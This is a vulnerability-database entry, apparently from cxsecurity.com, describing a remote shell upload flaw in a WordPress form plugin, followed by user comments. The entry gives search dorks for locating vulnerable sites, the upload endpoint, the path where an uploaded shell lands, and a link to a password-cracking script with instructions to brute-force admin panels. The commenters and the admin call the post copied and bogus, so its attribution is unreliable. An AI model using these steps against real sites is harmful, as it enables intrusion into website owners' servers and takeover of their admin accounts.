WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability

>Exploit Title : WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability >Exploit Author: The Mechiavellian || "facebook.com/TheMachiavellian/" >Vendor Homepage || Software link : ajaxformpro.com >Software Price : 19$ - 89$ >Version : 5.0.2 >Google Dorks : - inurl:''/wp-content/plugins/wp-ajax-form-pro'' - intext:''AJAX Form Pro - All Rights Reserved'' >Admin Panel Login Path : http://website.com/wp-login.php [+] use my account dictionnary crack script : https://github.com/adem313/glory/blob/master/r.py - use wordpress wordlists to hack the admin panel >Arbitrary File Upload/Remote Shell Upload Exploit : /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp >Directory File Path : /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/uploads/YourShellhere.php [+] accept : .php - .gif - .jpg - .png - .html - .fla - .pdf exploit by Cyberizm Digital Security Team

References:

the Machiavellian


Vote for this issue:
0%
100%

Comment it here.
Diederik Simon Koenraad | Date: 2019-01-01 15:44 CET+1
Dear Friend the Machiavellian, Shame on yourself. Why do you copy and paste other hacker's exploit ? You didn't discovered it. Please use firstly Google Search Engine and publish your one's. This Exploit/Vulnerability had been published on the date of 22/12/2018 and you just copied from packetstormsecurity and exploit4arab and published here. No you are wrong. Please be more careful. This is Original Exploit from PacketStorm and Exploit4Arab [ 22/12/2018 ] packetstormsecurity.com/files/150888/WordPress-WP-Ajax-Form-Pro-5.0.2-Shell-Upload.html - exploit4arab.org/exploits/2316 This is copy paste expl. [ Changed some texts with your own [ the Machiavellian ] ] => cxsecurity.com/issue/WLB-2019010014 Please be more careful. And do not copy paste. Use Google and look at other Exploit Sites before u publish yours. Shame on yourself the Machiavellian.
Admin | Date: 2019-01-02 15:11 CET+1
Thanks Diederik. Zero tolerance for fake content and copy-boys. Ban for 30days has been granted.
indoushka | Date: 2019-01-03 08:29 CET+1
fake content Authored by KingSkrupellos Shame on yourself بهدلت بينا وسط لجناس
Hmei7 | Date: 2019-06-21 23:48 CET+1
Duplicates from other hacker article. Kids.
m0ze | Date: 2019-06-24 10:25 CET+1
@Diederik Simon Koenraad, all submits of this «researcher» is a copy-paste ripoff with changed copyright. @Admin, just curious, y u don't delete all this ripped-off reports?
Admin | Date: 2019-06-24 15:25 CET+1
Bro. Zero tolerance for copy-boys. Lets change the status for bogus and keep the evidence of lamers. FYI this person have a ban
m0ze | Date: 2019-06-24 22:53 CET+1
@Admin, "keep the evidence of lamers" sounds fair. Anyways, it's cool that you care, bro!

Copyright 2025, cxsecurity.com

 

Back to Top